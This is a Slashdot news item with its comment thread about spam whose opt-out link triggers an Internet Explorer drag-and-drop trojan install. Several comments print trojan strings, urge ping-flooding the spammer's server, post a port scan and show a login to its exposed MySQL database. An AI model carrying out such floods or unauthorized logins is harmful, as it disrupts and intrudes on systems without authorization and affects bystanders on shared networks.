Spam Opt-out Link Triggers Malicious Code Attack

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site, that when the user scrolls the page, triggers a drag-drop javascript exploit. Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings. As The Reg says "It comes as little surprise that this feature is been taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in questions points to www. xcelent.biz (As in The Reg story, space intentionally included) so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

devious

[hendridm]

Fortunately, there is a patch for it, Mozilla is unaffected, and Norton and McAfee (at minimum) seem to detect it. That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus!

Re:devious

For the lazy, the link in the article didn't work. For the lazy people who don't wan tto type, the link to the cited site is (www.xcelent.biz); but it's recommended you RTFA first to see what's on the site, and choose your browser carefully before clicking. Links like this make goatse look tame.

Re:devious

[iamacat]

Here is a link that will give their server some grief without running the trojan. Then again, they might put it there later, so I still wouldn't run it from IE. Maybe do "Save as" instead of open?

Re:devious

[magarity]

Since this is an IE exploit, I hit the parent's link with Mozilla and was told that my email address was removed from the database. WTF email address was "removed"? It looks like a completely bogus opt-out since they don't check that you've even submitted an email addy to be removed, nevermind actually finding and removing a record in their database. Yet the /. article states that the spams in question comply with the requirement of having a removal link. What good is a removal link that says you're removed when really no such thing happened??? I especially love the 'click here to enter more email addys to be removed'. I'll bet $20 that's just a harvesting technique.

Re:devious

[jargoone]

Wow. Just... wow.

Yet the /. article states that the spams in question comply with the requirement of having a removal link. What good is a removal link that says you're removed when really no such thing happened???

The requirement is that they have a link to opt out. There is a link to opt out. The page linked to doesn't actually allow you opt out, but that's a problem with the "rule", not this particular spammer!

I especially love the 'click here to enter more email addys to be removed'. I'll bet $20 that's just a harvesting technique.

I'll give you $20 on the condition that you start reading your email by telnetting into the POP server.

Re:devious

[temojen]

choose your browser carefully before clicking.

I recommend wget for this purpose.

If you just want to snag a copy of the trojan for analysis, here it is!

Re:devious

That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus...

Incomplete statement

...again!
...still!
...Goddamnit!

Re:devious

[Three+Headed+Man]

I'm still having trouble getting it to work in Wine.

Re:devious

Just one more reason why Linux isn't ready for the desktop...

oh wai

Re:devious

[interJ]

What patch? This vulnerability affects Win XP SP2 with all updates installed. See here for more info and a harmless demonstration.

This is a bug that has been known publicly for over a month, but apparently Microsoft have other priorities.

Re:devious

[Mycroft_VIII]

You don't telnet into yours? Seriously I used to have to do just about that to un-fubar My fathers e-mail account. Seems the support people at Earthlink 'don't support the telnet e-mail client' when I try to describe how I KNOW the problem is at thier end and not caused by Outlook Express having a wrong setting.
Now if I can just convince my uncle to stop sending attachments of TEXT of all things to everyone he knows from his win3.11 system(he refuses to upgrade because it works and nothing good has come out since the amiga anyway.)

Mycroft

Microsoft says "No Problem"

Don't worry, this isn't a real problem:

"Given the significant amount of user action required to execute an attack, Microsoft does not consider this to be a high risk for customers," a company representative said, adding that the software giant's security experts are continuing to research the issue.

I mean, using a scrollbar. Come on, what kind of ignorant user is going to use a scrollbar an a site they don't trust? ;-)

Re:Microsoft says "No Problem"

Here is the pertinent CERT advisory for this flaw.

The idea is that all the website designer has to do is make an image that LOOKs like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kinds of prompts whatsoever.

Even with SP2 installed.

Re:Microsoft says "No Problem"

God, that seems like too much trouble for me. They need to click a link sent in an e-mail, then click and drag a fake scrollbar? Why not use the JPEG buffer overflow exploit to get their code onto the computer instead- An HTML e-mail with the JPEG embedded in it will do just fine. All the user has to do is read his e-mail and BANG! ZOOM! PWNED!

Re:Microsoft says "No Problem"

This is my favorite part:

III. Solution

Disable Drag and drop or copy and paste files
Disabling the zone security preference "Drag and drop or copy and paste files" prevents drag and drop operations.

Note: This preference is not honored with Windows XP operating systems.

Oh-well, at least it won't affect my Linux and OS/2 boxes if I turn that off.

Re:Microsoft says "No Problem"

Good thing i have a scrollwheel on my mouse :)

Re:Microsoft says "No Problem"

[NineteenSixtyNine]

what kind of ignorant user is going to use a scrollbar an a site they don't trust?

The same kind that use a browser they can't trust.

Re:Microsoft says "No Problem"

[fymidos]

oh, come on now, it was just a typo, what they meant was that it is not a high risk for MS *intellimouse* customers.

Re:Microsoft says "No Problem"

[bheerssen]

Yep, exactly right.

For the curious, here is an interesting post that describes the exploit at some length. Essentially, it uses an HTML 'dynsrc' attribute (proprietary Microsoft extension) to allow IE to download the executable, and javascript to use the 'shell:' protocol to execute it. It's not a particularly new flaw, but this is the slickest exploit of it I've seen.

Re:Microsoft says "No Problem"

[Psykechan]

Yep. This is precisely why I always use a scroll wheel to navigate. I'm not going to be caught off guard by this sort of scam.

Ooh look! What a pretty JPEG.

Re:Microsoft says "No Problem"

[microsopht]

Hi dude~!
Iam getting paranoid of clicking any link in Slashdot!

Clicking on the gmail invites took me to a bloody pornpage,inspite of having the caption [Google] provided faithfully by slashdot.
Luckily ( or so i think } i was using firefox - but still the porn page, with shaking windows and a horrible voice (SWF) hit me.

Could clicking on the link damaged my comp?any thing could hav been installed?

Please.how to know which links to trust? - since even the properties / caption box [ google ] are ineffective.

Re:Microsoft says "No Problem"

Make sure that you see the link does not have i'm feeling lucky in it, you can copy paste it to notepad if you like to decypher it. Right click, copy link address.

if btnG is in the link (as in btnG=Google+Search) then it's a search, if btnI is, it's I'm feeling lucky, and will take you directly to the url. Same if http:// is in the url, as google believes you meant to go to that address.

I dont know about you

[OverlordQ]

but my AntiVirus has detected this exploit for a *long* time.

JS/Exploit-DragDrop.b.gen

Re:I dont know about you

[NeoSkandranon]

Yeah except you update your defs dont you?

Seriously though, I've seen computers bought less than a month previously that ALREADY have their subscription expired due to the length of time the computer sat at the store---it's not surprising to think that even new-ish comptuers might not have either the patch or the virus defs

Re:I dont know about you

No excuse..

http://www.free-av.com/
http://free.grisoft.com /freeweb.php/doc/2/

Re:I dont know about you

ClamAV is probably the best, most up-to-date free anti-virus software out there currently. The link is for the Windows version.

For Linux just "apt-get install clamav". You do use Debian, right?

Re:I dont know about you

[Red+Alastor]

We also get the goodies in non-Debian distros. For Fedora it's : yum install clamav

Re:I dont know about you

[orangesquid]

A simple string analysis of the trojan reveals some intimidating-looking strings:
GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0 , w32.exe,
Windows Service Application, www.earthlabs.biz,
sockproxy/rec.php.
Software\M icrosoft\Windows\ CurrentVersion\Run
Software\Microsoft\Windows\ CurrentVersion\RunServices
%s?&p=%d&v=%s
VisitWe bPageThread , Socket4RandomThread, Socket4ServerThread
SYSTEM\CurrentControlSet\ Control\SafeBoot\
explorer.exe
Mozilla/4.0 (compatible)
InternetCloseHandle, InternetGetLast ResponseInfoA
InternetReadFile , InternetCrackUrlA
InternetOpenUrlA
InternetOpenA , InternetConnectA
FtpPutFileA, FtpGetFileA
HttpSendRequestA, HttpOpenRequestA
InternetGet ConnectedStateEx, InternetGetConnected State

Re:I dont know about you

[waynelorentz]

No excuse..

http://www.apple.com/
http://www.linux.org/

interesting strings

the executable contains the strings "xProxyBot v 1.0.0" and www.earthlabs.biz/sockproxy/rec.php.

Re:interesting strings

Virus Scan for Linux v4.32.0
Scan engine v4.3.20 for Linux.
Virus data file v4394 created Sep 22 2004

Identified it as:

$ uvscan --secure windows-update32.exe
/home/recall/windows-update3 2.exe
Found the BackDoor-CHP trojan !!!

Re:interesting strings

[temojen]

Also:

Microsoft Visual C++ Runtime Library

and xProxyBot returns no results in google, but ProxyBot returns 248, few of them trojan related.

Re:interesting strings

What's really interesting about that is the whois lookup information... the company that owns that website is known as AskFindPay from Hong Kong... and the xcelent website is property of Chunghwa Telecom Co. in Taipei. Say... who else wants to send a few hundred of these emails back to the domain owners? ::Evil grin::

Re:interesting strings

[Carnildo]

Thanks! Now I can label it properly for my collection!

More Legislation Needed.

[FearTheFrail]

So now that we have a legal, malicious attack, we'll only have to wait a few -more- years for bills to be passed to have the law catch up with some watermark of digital exploitation. Super.

Re:More Legislation Needed.

[auzy]

Actually, I think thats the wrong approach. I just think vendors like Microsoft need to take responsibility for the poor security in their products.. Many exploits against windows products for instance were long known to come out before they were released, amongst many others. There was a time when eeye had serious exploits listed that took Microsoft longer then 100 days to fix.

Also, from past experience, legislation is often abused in computer cases (as demonstrated by people like the RIAA). Personally, its been pretty rare to see decent laws against computer crimes (I haven't heard of any I agree with so far).

I think the development of sender verification frameworks for Email will also eventually help, provided that MS is willing to accept the open standards for once.

Re:More Legislation Needed.

[stratjakt]

There's nothing legal about this.

It's not specifically illegal under the CAN-SPAM act, but it's just as illegal as any other exploit, trojan or worm.

Re:More Legislation Needed.

But by clicking the link you expressed assent...

Re:More Legislation Needed.

[stratjakt]

Assent isn't a word.

And noone expressed "consent" to have their machine hijacked by an IE exploit.

It's not legal, and the only reason it's online is because it's on some shady Taiwanese host.

Re:More Legislation Needed.

> Assent isn't a word.

Yes it is.

Re:More Legislation Needed.

You went to the web page of your own free will, using something known to be bad. Caveat Emptor.

Main Entry: 1assent
Pronunciation: &-'sent, a-
Function: intransitive verb
Etymology: Middle English, from Old French assenter, from Latin assentari, from assentire, from ad- + sentire to feel -- more at SENSE
: to agree to something especially after thoughtful consideration : CONCUR

Re:More Legislation Needed.

[ColdGrits]

" Assent isn't a word."

Are you sure about that?

Assent means To agree, as to a proposal; concur. - http://dictionary.reference.com/search?q=assent

Re:More Legislation Needed.

[gcaseye6677]

The government could crack down on most spam sources anytime they feel like taking the problem seriously. With all the business, tax code, interstate commerce, and other regulations on the books already, any spammer is bound to be violating a bunch of existing laws. And since many spamvertized products and services are fraudulent or blatantly illegal, simply prosecuting with traditional laws would be adequate.

If the IRS started auditing every known spammer with operations or residence in the United States, that would have a very chilling effect on spam. I'd bet my life savings that spammers don't report all of their income for tax purposes. If other countries then followed suit, spam would be relegated to the far corners of the world and easily firewalled.

Re:More Legislation Needed.

[Red+Alastor]

And many situations don't need a completely different law when it happens with computers. A fraud is a fraud no matter what the medium you use is and there is already good laws about it.

Re:More Legislation Needed.

[mdfst13]

"You went to the web page of your own free will, using something known to be bad. Caveat Emptor."

Obviously people here are aware that the site is bad. However, people who actually get the link in an email would be under the impression that the site is an opt out link. Providing them a virus instead is fraud and illegal.

If "known to be bad" refers to IE, that doesn't excuse anything. That's like saying that if you forget to lock your door, then it's all right for people to steal your stuff. In reality, it's still just as illegal.

Re:More Legislation Needed.

[FuzzyBad-Mofo]

Assent is a perfectly good word, but noone is not.

Your braking my hart, I hate to be a looser grammar nazi, but it's these errors witch need two bee preventated.

Re:More Legislation Needed.

[musikinov]

As I see it, the US government will never put an end to spam. What it will likely do is regulate and tax it.

Your company wants to send out advertisements? Okay, pay your state $0.07 per e-mail and you can bulk mail all you like.

Re:More Legislation Needed.

[xouumalperxe]

Oh, they'll agree to the standards alright. and 2 days later they publish the new and improved version of your standard, with super-duper (and highly exploitable) proprietary extensions that mean MS is so much better than the competition. Accepting open standards isn't the problem with MS. It's the staying within them that's the trick

Re:More Legislation Needed.

[Warhaven]

They should cover their bases and start including an EULA with their malware: "By downloading this software, you agree that we are not responsible for any damages that may incure through use of this product, either directly or indirectly."

Re:More Legislation Needed.

[Mycroft_VIII]

No, going to a website to opt out of an e-mail is not agree-ing to download a trojan or other mallware or otherwise have your computer hijacked.
It's like saying because you entered a shopping mall you assented to having your car hotwired driven at 180 mph by the guys from the food court because you parked in thier parking lot.

Mycroft

Re:More Legislation Needed.

[Gopal.V]

> That's like saying that if you forget to lock your door, then it's all right for people to steal your stuff. In reality, it's still just as illegal.

But you still lose out on your insurance ... being "Stupid" has its own costs .

More people have to know that browsing with IE is the equivalent of buying a bicycle lock for your house. Of course, it will stop any decent guy from entering the house , but the first thief with a pair of pliers will go in :)

Hmm.. I wonder how "Security through Obscurity" works for Microsoft ... they are the most COMMON boxes and it just makes the job easier.

Re:More Legislation Needed.

"people who actually get the link in an email would be under the impression that the site is an opt out link. Providing them a virus instead is fraud"

Presumably if the virus is damaging enough, it would prevent the recipient from receiving email again, thus qualifying as an "opt-out"...? ;-)

Another good reason...

[Three+Headed+Man]

...to get SpamAssassin.

Re:Another good reason...

[d_jedi]

Is that even available for Windows? From the spamassassin.apache.org website, it doesn't appear to be. And if it does, does it integrate with Outlook?

Re:Another good reason...

..to get SpamAssassin.

No. A good reason to hire a Spammer Assassin,
perhaps.

Violent, painful death is, after all, the only thing these sleaseballs fear.

Re:Another good reason...

[Jord]

Yes there are tools out there that let you integrate it into outlook. A simple google search will show how it is done.

Re:Another good reason...

[d_jedi]

Only link I found for this was:
http://www.openhandhome.com/howtosa300.html

Which is a pretty fricking long installation procedure.. most likely beyond the capabilities of anyone who would actually be affected by this exploit (ie. people who haven't applied recent patches, who don't have an up-to-date virus scanner, who click on links in spam messages..)

In particular, even I (and I consider myself quite knowledgeable) had no clue with this step:

# Critical: Next, find \perl\bin\spamasasssin.bat (it is probably read-only, which will cause you grief in a second), and add at the beginning (well, nearly: right after the @ECHO OFF line.)

SET RES_NAMESERVERS=ipaddress
SET LANG=en_US

Now, for people running their own DNS server, this isn't a big deal.. but for the rest of us..

Greeting from Malaysia

[politicsie04]

Whois says that the website is operated by Anandan Krishan from Malaysia, so lets all send him an email, win2save@yahoo.com , complaining that he has discrimnated against Firefox, and Linux users of his website, and that in future he should have a more inclusive virus.

Re:Greeting from Malaysia

[Nos.]

I tried to post the whois for the site as well as the whois for the IP that it's hosted on but gave up when /. said I had too many "junk" characters. Sheesh... here's a quick summary of the IP owner though:

Yu, Shao
4F, No. 7, Aly. 7, Lane 355, Sec. 2, Neihu Rd.
Taipei City
TW
Shao Yu (SY167-TW) hn87788676@hn.hinet.net
+886-9-36-045496

Re:Greeting from Malaysia

[Smallpond]

Hmm...Not Malaysia, address 61.218.79.53

Country: TW
Netname: YU-SHAO-E4-TW
Descr: CHTD, Chunghwa Telecom Co., Ltd.Data-Bldg. 6F, No. 21, Sec. 21, Hsin-Yi
Rd.,Taipei Taiwan
Status: ASSIGNED NON-PORTABLE
Source: TWNIC
Server: APNIC
Inetnum: 61.218.79.48 - 61.218.79.63

Re:Greeting from Malaysia

[d_jedi]

Wow, should be easy to find this scumbag and send him to jail for a long time.. where he (assuming he is the virus writer) belongs.

Re:Greeting from Malaysia

Just paste in the lameness filter, so you have a high enough proportion of words.

Re:Greeting from Malaysia

[theparanoidcynic]

Yeah! Using our mighty software from the future we don't have the pleasure of these amazing exploits.

Sometimes, when I get bored I fire up my emulated Pentium Pro and take unpached IE 5 for a spin. It's heartwarming that the internet cares enough to 0wn me within thirty seconds of simply visiting it . . . . .

Re:Greeting from Malaysia

[doubtless]

for the uninformed (apparantly not the parent), Anandan Krishan is one of the few billionaires from Malaysia.

He is the man behind 2 of the most successful companies, Maxis mobile (largest mobile service provider), and Astro (the only satellite TV provider).

Dumb

[sl8r]

Also, the programmer seems to have had fun writing the javascript on that xcelent.biz page. From the source:

// probably the dumbest scrollbar emulation on this planet ;)

Re:Dumb

[Benanov]

That comment means it was ripped from a proof-of-concept website published a while ago: http://www.mikx.de/scrollbar/ Amazingly shameless. They stole this guy's code, AND they're using it for phishing attacks.

Why is the site still up?

[jarich]

The article says they know the name of the website... why is it still there? Why is the EXE still available?

I realize that another spammer will take advantadge of the hole next week but if the hosters were blacklisted from DNS servers, the offending files might get removed a little faster.

Re:Why is the site still up?

[gorbachev]

Two possible reasons:

1. Law enforcement agencies asked to keep it up

2. Hinet Taiwan doesn't give a shit

I'm betting on option #2.

Re:Why is the site still up?

[PriceIke]

Because it hasn't been /.ed yet. Too many warnings to not go there.

Re:Why is the site still up?

[mblase]

I realize that another spammer will take advantadge of the hole next week but if the hosters were blacklisted from DNS servers, the offending files might get removed a little faster.

That would take time. It's much quicker and easier to just slashdot the site.

Useful slashdotting!!

[Evan+Meakyl]

The link in questions points to www. xcelent.biz (As in The Reg story, space intentionally included)

There should be a real link, in order to /. it!!!

Re:Useful slashdotting!!

[savagedome]

You can install Linkification that allows you "to view plain-text URLs and e-mail addresses as actual links". Well, of course I am assuming you are not running IE!

Re:Useful slashdotting!!

[Oliver+Wendell+Jones]

Linkification doesn't do you any good if it's not a valid URL (i.e., it has a space in it). Other then that, it is one of my favorite extensions.

Re:Useful slashdotting!!

[amRadioHed]

You should install the Plain Text Links extension too. With that you select the url then right click and you have an option to open it. The nice thing is this extension filters out white spaces, so it even works for long URL's broken up by slashcode.

Re:Useful slashdotting!!

[Oliver+Wendell+Jones]

Woot! Thanks! I love this feature in UltraEdit! Slashdot needs more people like you!

Re:Useful slashdotting!!

Hmm, can someone please hack that server and upload a different file?

opt out just confirms ur email address

for all the other lists...

Use your powers for good

[Mignon]

Why don't we non IE-users use the Slashdot effect for good? Let's all visit the evil site and soon it will be a steaming pile of rubble.

Re:Use your powers for good

[datastalker]

It's a text site... it will take a lot to Slashdot it!

Re:Use your powers for good

[zx75]

Yes! Oh, just one note to everyone... Don't use the scroll bar.

Or better yet, do... it'll increase the traffic to the site ;).

Re:Use your powers for good

[BenjyD]

There's a form pointing at a cgi script at the bottom of the page for "removing your email". I wonder if a scrip that kept calling that might take up a bit more CPU for them?

Re:Use your powers for good

[sockonafish]

Wheeeee.

sudo ping -f www.xcelent.biz (I never ping flooding required super user priveleges)

Re:Use your powers for good

[ElNeo]

Maybe we could fill the log-file?

Re:Use your powers for good

Remove email address?!? Why, certainly!

president @ whitehouse.gov

Re:Use your powers for good

[ElNeo]

This link (click the link below to show link) sendes the first 10.000 numbers of pi as a parameter to a existing script on the evil site. Whould fill the error-log in no-time =)

Re:Use your powers for good

[Kludge]

You can use
ping -s 4096
to increase the packet size to bring up the load.

Re:Use your powers for good

[Masami+Eiri]

And to add insult to injury, throw in an https://.

Re:Use your powers for good

[ElNeo]

Like this nice link?
(click link below to show link...)

Re:Use your powers for good

[BenjyD]

Hmm, I think I just hit a Firefox bug - I copy and pasted that link to my address bar and it appeared with all the text overlapping. And then crashed my X server.
Maybe it was a stupid thing to do, but not an X-crashingly stupid thing to do.

Re:Use your powers for good

[BenjyD]

Except that wouldn't that also slow down connections for other net users in the same block?

Not exactly very ethical.

Re:Use your powers for good

[Frank+T.+Lofaro+Jr.]

The site runs Apache (version 2 in fact) on Linux, so how can it be evil?

Re:Use your powers for good

[bockman]

What if they (the evil ones) read slashdot and have placed on the site some content exploiting mozilla flaws and/or opera exploits (uhmmm, this thime google got a bit confused )

Re:Use your powers for good

[Lehk228]

brilliant.

Re:Use your powers for good

[microsopht]

Just beacause a slashdotter has a non IE browser he should click the link for the Slashdot effect? yuck! How many would have the courage to do it, knowing full well that it has malicious code?

Atleast , I Wont!

Re:Use your powers for good

Don't do that.

You're abusing everyone in between, not just them.

New News?

[Kartik3]

Spammers have often used an "unsubscribe" link or something similar only to verify your email address and send you more spam. While not the same as triggering an exploit, I've been under the impression that spammers have taken advantage of users with an "opt out" type of link in this way for quite a while now.

Re:New News?

[eqkivaro]

Good point.

I'm amazed that anyone clicks on those links. Best case scenario you get an annoying string of web pages; worst case scenario you've just confirmed for the spammer that they've found a live email address.

-chris

Re:New News?

[MillionthMonkey]

You'd have to be nuts to click on any link at all that arrived via spam. "Unsubscribe" links have been proven time and again to be feedback mechanisms for helping spammers identify good addresses.

Of course, now that we have HTML email with IMG tags (whoopee.) you don't even need to click on a link anymore.

Re:New News?

[gstoddart]

That's why everyone disagreed with the use of opt-out in the first place.

Most people don't ever click on the opt-out link for that exact reason. The fact that someone has made it even more dangerous to do so just proves the point.

As long as they can keep saying "but you haven't opted out" they're safe.

Re:New News?

[xouumalperxe]

"As long as they can keep saying "but you haven't opted out" they're safe." I was under the impression that you had to opt in to start with? so that if push comes to shove and it gets to the courts (provided you track down the bastard), he'd have to PROVE you had given him permission to use the mail somehow. OR is that just european union stuff? I know that in the US you need to say that you DON'T want mail sent to you when you subscribe something (say, creating an acct here at /.), whereas here in the EU you have to specifically say you allow it

lamer is hosted on hinet.com

[Indy1]

host www.xcelent.biz
www.xcelent.biz has address 61.218.79.53
host 61.218.79.53
53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net

and people wonder why i firewall 60/7

MIME Defang

[alatesystems]

This is a good reason to use mime_defang with spamassassin. Either do that or what I do, have it actually attach the message as a .eml file(rfc 822 or whatever) and then you can view it in whatever you want and even reimport it into your mailbox.

I hate spam, but I haven't had a false positive or negative in forever combining the bayes inside spamassassin with the bayes inside thunderbird.

Chris

Re:MIME Defang

[gmuslera]

Or better yet, Anomy Sanitizer. It disables "active" html content (i.e. javascript) attached to mails, can quarantine/rename files by extension, and of course, can call a configurable antivirus to check and take actions.

That is mostly the way i use it, disabling html, checking attached files for virus, and the windows executable extensions that passed the antivirus check gets renamed anyway to make them not executable without strong user action. Attached HTML pages sometimes don't look/work as desired, but I not have to worry about someone receiving this particular piece of spam.

Exploit

[jargoone]

The article didn't give much explanation about the drag-and-drop exploit itself. Understandably, given the audience, but I was curious. Here's a good link: http://xforce.iss.net/xforce/xfdb/13679

DNS blacklist is pretty severe

[davidwr]

Blacklisting from DNS by anyone other than the domain-owner or the DNS-server-ownser should not be easy.

The real question is why the people providing connectivity haven't pulled the plug at least temporarily. Any REPUTABLE provider would.

Re:DNS blacklist is pretty severe

Simple, Hinet Taiwan isn't a reputable provider. Their a spam/warez/script kiddy host.

Re:DNS blacklist is pretty severe

[davidwr]

Who's there upstream? Their the ones to kick off.

As far as DNS-blackballing "black hat" hosts go, that needs to be done independently of the offical DNS tables.

Nothing says you can't start a "webRBL" blackhole list similar to the spam-port-25 RBLs and encourage ISPs and companies to use your service. In fact, if it's not already being done I'd encourage you to do so.

Just don't pretend to be "official."

Re:DNS blacklist is pretty severe

[robslimo]

alter.net is the upstream. If I recall correctly, they have a bit of a reputation

traceroute

3 164.58.10.65
4 164.58.10.213
5 164.58.10.222
6 [64.200.104.89]
7 64.200.105.58
8 [64.200.110.82]
9 GigabitEthernet4-0.GW2.DFW13.ALTER.NET [157.130.
30.249]
10 0.so-1-0-0.cl2.dfw13.alter.net [152.63.103.230]
11 0.so-0-0-0.tl2.dfw9.alter.net [152.63.2.181]
12 0.so-5-0-0.tl2.lax9.alter.net [152.63.0.58]
13 0.so-4-0-0.cl2.lax15.alter.net [152.63.116.106]
14 pos5-0.gw1.lax15.alter.net [152.63.115.213]
15 hinet-gw.customer.alter.net [208.222.12.234]
16 kh-c12r31.router.hinet.net [211.22.225.174]
17 kh-c12r1.router.hinet.net [211.22.225.129]
18 tp-s2-c12r1.router.hinet.net [210.65.2.34]
19 tp-e4-c12r1.router.hinet.net [210.65.2.129]
20 tp-e4-c6r5.router.hinet.net [211.22.36.41]
21 h201.s100.ts.hinet.net [168.95.100.201]
23 61-218-79-53.hinet-ip.hinet.net [61.218.79.53]

Trace complete.

To bad the filter itself is so lame. I had to add a whole bunch of meaningless verbal meanderings to get this post through it.

interesting ports on the spammer's site

[Indy1]

Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at 2004-09-22 09:54 MDT
Interesting ports on 61-218-79-53.HINET-IP.hinet.net (61.218.79.53):
(The 1651 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
135/tcp filtered msrpc
443/tcp open https
445/tcp filtered microsoft-ds
3306/tcp open mysql
6000/tcp open X11

Nmap run completed -- 1 IP address (1 host up) scanned in 54.453 seconds

Re:interesting ports on the spammer's site

[TCM]

$ telnet 61.218.79.53 22
Trying 61.218.79.53...
Connected to 61-218-79-53.HINET-IP.hinet.net.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.5p1

Hmm.. Isn't 3.5p1 vulnerable to some exploit? Not that I'm implying anything!

Re:interesting ports on the spammer's site

http://www.securityfocus.com/bid/4241/info/

*lalala*

- TCM's non-whoring alter ego

Re:interesting ports on the spammer's site

[caluml]

bash-2.05b$ mysql -h 61-218-79-53.HINET-IP.hinet.net
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 658 to server version: 3.23.54

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------+
| Database |
+-----------------+
| earth_bizzads |
| herbalmarketing |
| mysql |
+-----------------+
3 rows in set (0.45 sec)

mysql>

Re:interesting ports on the spammer's site

[t35t0r]

OH MAN YOU're not KIDDINg!!

Re:interesting ports on the spammer's site

[TCM]

That link is for 3.1. Stupid AC must have been confused 3.5 with 2.5.

That AC is not me.

*runs*

Re:interesting ports on the spammer's site

unfortunately the databases's cannot be "used" without some sort of...

Re:interesting ports on the spammer's site

Alas, that's the most one can do; access to actual databases is denied.

Re:interesting ports on the spammer's site

Have you tried specifying a username? I'm too squeaky-clean to go logging in to other people's stuff...

mysql -u root ...

Re:interesting ports on the spammer's site

[sfe_software]

3306/tcp open mysql

Interestingly they never disabled the default "test" user for MySQL. Not that much can be done (user "test" has no privileges on any databases) but I was in fact able to log in...

Re:interesting ports on the spammer's site

earth_bizzads
Interesting, one of the string literals in the downloaded binary is "www.earthlabs.biz/sockproxy/rec.php", a database of infected clients perhaps?

Re:interesting ports on the spammer's site

[Aliencow]

PORT STATE SERVICE VERSION
21/tcp open ftp vsFTPd 1.1.3
22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
111/tcp open rpcbind 2 (rpc #100000)
135/tcp filtered msrpc
443/tcp open ssl/http Apache httpd 2.0.40 ((Red Hat Linux))
3306/tcp open mysql MySQL 3.23.54
6000/tcp open X11 (access denied)

Re:interesting ports on the spammer's site

[5m477m4n]

hmmm, their certificate, issued to SomeOrganization expires on 9/21/2004.

Re:interesting ports on the spammer's site

$ mysql -u test -h 61-218-79-53.HINET-IP.hinet.net test
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1086 to server version: 3.23.54

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| SPAMMERS_SUX0r |
| w00t |
+----------------+
2 rows in set (0.94 sec)

mysql>

hehehehhehe

Re:interesting ports on the spammer's site

[ravydavygravy]

Heh - this is what it looked like a few minutes ago...

mysql> use test;
Database changed
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| SPAMMERS_SUX0r |
| w00t |
+----------------+
2 rows in set (0.84 sec)

Re:interesting ports on the spammer's site

[BenjyD]

Seems to be changing rapidly...

Re:interesting ports on the spammer's site

[Abalamahalamatandra]

Except, on Red Hat, it may have been backpatched - still reporting the same version but the hole is closed.

Re:interesting ports on the spammer's site

It would be a *real* shame if someone changed the index file of the apache server to a picture of goatse. That would stop people from clicking on "unsubscribe links" for a Loooong time!

Re:interesting ports on the spammer's site

It also has BIND running, but it is bound to a different IP address on the machine (61.218.79.50), version 9.2.1, allows AFXR queries and is authorative for the xcelent.biz zone, but nothing significant in there.

Re:interesting ports on the spammer's site

Eeeeeevul! but I like it...

Re:interesting ports on the spammer's site

[BillX]

mysql> show databases;

(snipped thanks to lameness filter)

4 rows in set (11.56 sec)

mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
...and there it's been sitting for the past half hour or more. I love that 12-seconds just to display the list of DBs. Congratulations Slashdot, you slashdotted the spammer's sql server!

Re:interesting ports on the spammer's site

[HSpirit]

...and (predictably) this is what it looks like now:

% mysql -h 61-218-79-53.HINET-IP.hinet
ERROR 1040: Too many connections

Good to see the slashdot effect is portable to the MySQL protocol :)

Re:interesting ports on the spammer's site

[ocelotbob]

When it all comes down to it, pretty much all slashdottings are from the database backend. Usually even modestly powered sites can handle a slashdotting with just a bit of slowness, if they keep the content simple and static.

THIS IS GETTING OLD!

Look at the links in the original post. Notice the added URL at the end of the supposed "Google invites" link? If you klick on these you deserve what you get.

Somewhere on this planet there is a bunch of fscking losers whose sole means to get satisfaction is to redirect newbs to shock sites à la goatse or tubgirl. How utterly pathetic.

And I'm feeding them, I know, I know...

Re:THIS IS GETTING OLD!

The great thing is that you are helping me by drawing more attention to this thread when you get modded up. For the love of god, please continue to point out my links, you are only increasing my StatsMeasure rankings.

"Scarily"

not a word

Re:"Scarily"

Scarily

adv : in an alarming manner; "the disturbing thing
about the Minister's behavior is that far from
being artificial, it too often rings
frighteningly true" [syn: frighteningly]

Dictionary.com disagrees with you.

Re:"Scarily"

[Sloppy]

I protest. English may not be German, but we're still allowed to construct words.

The only thing I click on in a Sapm is...

[vasqzr]

The only thing you should be clicking on, in a spam message, is the delete icon/key.

Re:The only thing I click on in a Sapm is...

[lintux]

The only thing you should be clicking on, in a spam message, is the delete icon/key.

Or, if you got a training spamfilter, the "Mark as Spam" button. :-)

Re:The only thing I click on in a Sapm is...

[rawg]

No, you should first forward it to spamcop.net, then to uce@ftc.gov.

A SPAM opt-out trojan...

[nologin]

... that would turn your machine into a Spambot; now that would be funny. :)

CAN-SPAM may require an opt-out option in the e-mail to remain legal. However, the legislation DOESN'T protect you from the consequences of using that opt-out option.

It's legislated social engineering at its finest. Good luck out there.

Re:A SPAM opt-out trojan...

[gl4ss]

wel.. other legislation makes using such trickery illeagal in most countries anyways.

just because it's not in one law doesn't make it legal.

Not Surprising

[Trolling4Dollars]

IT Geeks - 1
Politicos without "tech savvy" - 0

This is the way it will always be unfortunately. Unless the whole population eventually can understand all the technical aspects of computers and the internet, or computers and the internet become so rock solid/secure AND easy to use, it will always be this way.

Re:Not Surprising

